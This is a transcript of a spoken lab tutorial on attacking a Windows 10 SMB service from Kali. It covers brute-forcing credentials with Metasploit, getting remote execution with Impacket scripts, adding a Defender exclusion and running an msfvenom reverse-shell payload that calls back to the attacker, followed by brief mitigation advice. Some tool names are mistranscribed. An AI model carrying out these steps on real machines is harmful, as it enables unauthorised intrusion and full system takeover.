Hi everyone, welcome to another tutorial. In today's video we're going to be taking a look at how to enumerate and exploit a SMB service for a Windows 10 machine. As you can see, I'm just running Windows 10 in a virtual machine. So the first thing we're going to need to do to enable the SMB service for Windows is to click on this folder icon down the bottom. Just click on the Network tab. If you're doing this for the first time, you'll see a yellow pop-up banner. Just click Enable, and that's all we need to do to enable file sharing on this computer. So now I'm just going to go over to my attacking machine, which is Kali Linux. As you can see, I've created a file called target.txt, which just has the IP address of the Windows 10 machine. If you're setting this up yourself, obviously your IP address will be a little bit different. So the first thing we're going to need to do is do some recon. We just need to find what open ports are available on the Windows machine. So to do that, just type nmap followed by the IP address -pn, which avoids doing ping scans. So if we do the scan with -pn not there, the nmap scan will get blocked by the Windows firewall. -A for an aggressive scan, and -T4 to speed up the scan. Well, looks like the nmap scan is finished. Looks like we've got 3 open ports: 135, 139 and 445. We're basically just going to be focusing on 445 for this tutorial at the moment. And the script scan looks like we've got a host name, MS Edge Win 10, which is running in a virtual machine, VMware. And looks like we're running SMB version 3.1.1. So I'm just going to note that down in the text file, which could be useful to us in the future. So now that we've done that, the first thing we will need to try is we'll need to try log into the SMB service using null logins. So if you haven't heard the term null logins, we're just log into the service with no username and no password. And if we're allowed access, we might be able to try and read some of the files on the share. So to do that, we're going to use a tool called SMB map, and the command is SMB map -H followed by the IP address. And if you get an authentication error, that means we can't log into the service with a null login. We will need a valid set of credentials. So let's just go back to the text file here. We've got a host name here, so I'm just going to do some research on Google to see if we can find any default users. Scroll down. Looks like we've found a default user, which is IE user. So I'm just going to note that down. So we've got a valid username, which is good. So there's another script we can use called enum for Linux. This will try and enumerate the user list on the operating system. So to use that, type enum for Linux, followed by the IP address, and use a -U, which just gets the user list on the operating system. So if we go down here, we can see we've got an error, and it says server doesn't allow sessions using username blank and password blank. So we can't enumerate the user list. We'll need a valid set of credentials. So the next thing we're going to have to do is we're going to have to try and brute force a valid user, just because we can't read or write on the SMB share at the moment. So there's tools like Hydra and Medusa. I've tried this attack with Hydra, but I was getting blocked by the firewall. So for this tutorial, I'm going to be using Metasploit. So just open up Metasploit, and there's a module in there called SMB_login, and we're just going to be utilizing that module once Metasploit loads. So to find the module, just type search SMB_login, and just copy and paste it. Type use, paste the module in, type options, and here's all the variables we can set for the program. The first one we're going to want to set is stop on success. This basically just stops the program once a valid password has been found. So to set it, type set stop on success and set to true. The next one we're going to want to set is the hosts, which is the remote host of the Windows machine we're targeting. And we're going to want to set the username, which is IE_user. And we also need to specify a password file that has all the passwords in we want to try. If we know, we can also do a single password, but because we don't know it, we're going to have to use a password list in this case. So I've got my own called passwords.txt. You can feel free to use your own if you want to. And I'll set the threads on this one to 10. Now that all the information has been entered, to run the attack, just type run, and then it will try and brute force the password to the account. So this will just try all the passwords in the word list. It's running them against the user, i.e. user, and it will report back if it's found the correct password for us. And something else to mention as well, if you're running this attack on a Windows 11 machine, Windows 11 has implemented brute force protections for the user accounts. So if you try to brute force, if the login fails 15 times in a minute, then the account will get locked out for 15 minutes on average. So just keep that in mind if you plan on running any brute force attacks on Windows 11. So it looks like that attack was a success. It's found the password, which is password 123, and it looks like we have access to an administration account as well. So we should be able to read and write files to the entire system based on the privileges that we have. So I'm just going to write that down in the text file as well. Password 123, and we are an admin. So now that we've got a valid set of credentials, we can try and further enumerate the users on the system. To do that, type search SMB underscore enum, and the module we want is SMB enum users. Type use, copy and paste, options, set the R hosts, we'll need to set the username as well, and we'll need to set the password. And just hit run once all that's done. So as you can see, we've found the user administrator, default accounts, guest, i.e. user, SSHD, utility accounts, and it's been able to detect the password policy as well. So lockout tries is 0, and the minimum password is 0. So if they had a password policy that locked out after 30 tries, then this will be 30. But it has no password policy, so we can pretty much brute force this machine all day and we won't get locked out. So I'm just going to copy and paste that and put that in the file. So now to do some further enumeration, we'll just open up SMB map again, because we'll need to enumerate all the permissions and the files on the shares that we have. So just type SMB map -H followed by the IP address. Now we're going to do a -U and specify the username. Specify -P and specify the password. And hit enter. So it looks like there's 3 remote shares, admin, C drive and IPC, and the permissions we have are read and write for the first 2 and read only for the third. So the ones we're interested in are the ones that have write permissions, and read only, we can only read the files, so we can't really do much with that. So to view all the files on the system, just type R, and this should enumerate all the files for us. So if we scroll up, we can see all the files on the admin drive, all the files on the C drive, and all the files on the IPC drive. So now what we need to do, we just need to try and upload a file to one of the directories just to prove that we have write permissions. And we can do that with the --upload option. Now I'm just going to try and upload a JPEG, just because we don't want to upload a shell straight away, just in case it gets caught by the antivirus. Just copy that in. And we'll also need to specify the share we want to write to, which in my case would be admin $/skull.jpg, and you can change this file name. I'm just calling it skull.jpg. hit enter. You can see it says upload complete. So we'll just go back to the -R option, and we should be able to see that our file skull JPG has been uploaded. So we can see here skull.jpg has been uploaded successfully. So we do have write access into the C drive. So we should be able to get a shell just based on our tests so far. And another thing to notice, because this is Windows, we can execute commands as well. And there's two ways we can do that. We can do that through the WMI service, or we can do that through PowerShell exec. So to do that, we can specify the -X command, and followed by the commands we want to execute. I'm just going to do who am I and press enter. If this hangs like this for a while, that means it's probably gotten blocked by the Windows firewall. So that didn't work. The other option we can do is psexec. Just type --mode psexec. And if we got an error here, that means that probably got blocked by the firewall as well. So there's a Python library called Enumerate, and you can just download that on GitHub. Just type Enumerate GitHub. Should be the first link here. And just click on the button code, and you can git clone it, or you can download the zip file for it. Obviously I've already downloaded this for this tutorial, so the scripts we need are located inside Enumerate, inside the folder examples. But the only ones we need to worry about a script called @exec and a script called psexec. So the first one we're going to take a look at is psexec, and what that does, it tries to get a shell and escalate permissions through the scheduler's task. So the syntax for the program, to use it, just type Python 3 psexec, and then enter the username, followed by a colon, followed by the password, followed by the @ symbol, followed by the target IP address. And that's all we need to do, and the program should try and upload a shell for us. You can see it's trying to do some stuff here. It looks like it's hanged, so I'm just going to go over to Windows. And looks like it's been picked up by the antivirus here. So I'm just going to exit out of that, because the script won't work unless the antivirus is disabled. So the second alternative here, we have a script called @exec. And it's basically the same syntax as before. Just type Python 3 @exec, followed by the username, followed by the password, followed by the IP address. And so the first command I'm going to run is who am I, just to verify that it works. So it looks like we've got a response here. We've got NT authority system. So it looks like it's escalated our privileges for us to system, which is the highest level of privileges that you can have on a Windows machine. So we should be able to read, write and execute files to the whole system, which is good. So we should be able to get a shell and elevate our permissions with this program. And before we do that, we need to figure out what antivirus product the Windows computer is running. So I'm just going to copy and paste this command here. And just copy and paste it in. And as you can see here, looks like we're running Windows Defender. If you see another product here like Bitdefender, Norton, or any other virus protection product, then you'll have to try and disable that first before uploading a shell. So the next thing we're going to do is we're going to try and put in an exclusion for the Windows Defender program, which you can do with this program with this command here. PowerShell add MP preferences, and we're going to set an exclusion to the C drive. If you want to set an exclusion to another drive, then you can just change it if you want to. So now I'm just going to copy and paste the new command in, and we'll see if we can disable the Windows Defender. Okay, so that looks good. I'm just going to go over to Windows and open up Defender. Click on Virus and Threat Protection, Manage Settings, scroll all the way down and click on Add or Remove Exclusions. And you can see we've got a exclusion for the C folder. So we've basically added an exclusion for the whole folder. So we should be able to upload anything in there and execute it. So just going back over to Kali. I guess what I'll try and do I'll try and get a Metasploit shell running on the target. So we'll just need to go into MSF Venom and create a payload for us. So just type MSF Venom, and the command is -p Windows x64 /meterpreter /reverse TCP. Then enter lhost equals the IP address of the attacking machine. If you don't know your IP address for your machine, you can get it by going if config. And as you can see, 10.1.1.201 is mine. And then put a space -l port equals, I'm using a port 4343, but you can use any port you want to. -f for format, the format is a exe file, and -o to name the file to whatever you want. I've just called it rev24, but you can call it shell or something else if you want to. So once that's done, you should have a file in the home directory called rev24 or whatever you called it. And I've just put that in my payloads folder, which I'm going to use to upload it. So to upload it, we're just going to utilize SMB map again. -H followed by the IP address. Specify the user. -p, specify the password. Now we're just going to upload a file again, use --upload, copy over the reverse shell, and specify the path we want to upload to, admin $/rev 24.exe. So that says upload complete, so we're just going to list out all the files again and see if our payload is there. -r, scroll up to the admin drive again, so it looks like that was successful. We've got a file called rev24.exe, so that has been uploaded. So now we'll just need to start a multi-handler session. So to do that, just type use exploit /multi/handler. Now I'm just going to copy over this payload here, and to set a payload, type set payload, then copy and paste the name of it. Set. Now we're going to have to set a lhost, which mine is 10.1.1.89, and we're going to have to set a local port, which is whatever you set during the MSFN configuration, which is 4343. I'm just going to hit run. So that should be running a local handler for us, and it's just going to wait to receive connections from the remote shell. So the next thing we're going to be doing is we'll need to reuse the @exec script, and to do that just type -3 @exec, enter the username, password and IP address, and to execute the reverse shell we just need to type rev24.exe, and when we run this, hopefully we get a meterpreter shell. We'll just go back to Metasploit and see if we've got it. So yeah, it looks like we've got the meterpreter session. So I'm just going to type get UID, and as you can see we are NT authority system, so we have complete control over this machine. Further exploitation, you could do a hash dump, you could reset username password, you could create another admin on the server, or you could pivot and attack other computers on the network as well. So yeah, we've pretty much got root access to this machine here, which is good. So I'll just drop into a shell. We're in system 32. I'll just type listing out all the files there. So yeah, so that's pretty much it for the exploitation side of things. We've been able to successfully enumerate, exploit, and get a shell with escalated permissions. So the only other thing that I'll probably show you is if we go over to Windows, in the search bar, type pol, click on local security policy. This is just how you would prevent these types of attacks. Click on account policies, type in account lockout policy, and the items we've got here are account lockout duration. So if we double click on that, we can set a duration here, and we've got account lockout threshold. So this will basically lock out after a certain number of attempts. So you could specify 10, 30 or 50, whatever a number of login attempts that will lock out the user. And you can also set a reset account lockout counter as well. So if the password lockout was set to 10, obviously we couldn't do a brute force attack because it would get blocked, and this whole phase of the attack would pretty much be useless. So that's a good method to lock out the account. So yeah, that's the only other thing that I would probably mention as well. And to further protect yourself, you could install a EDR solution as well to detect brute force attacks and to mitigate against them as well if you want even more security. But yeah, this is just something to be aware of. So just and yeah, that should be it for this tutorial. So thanks for watching.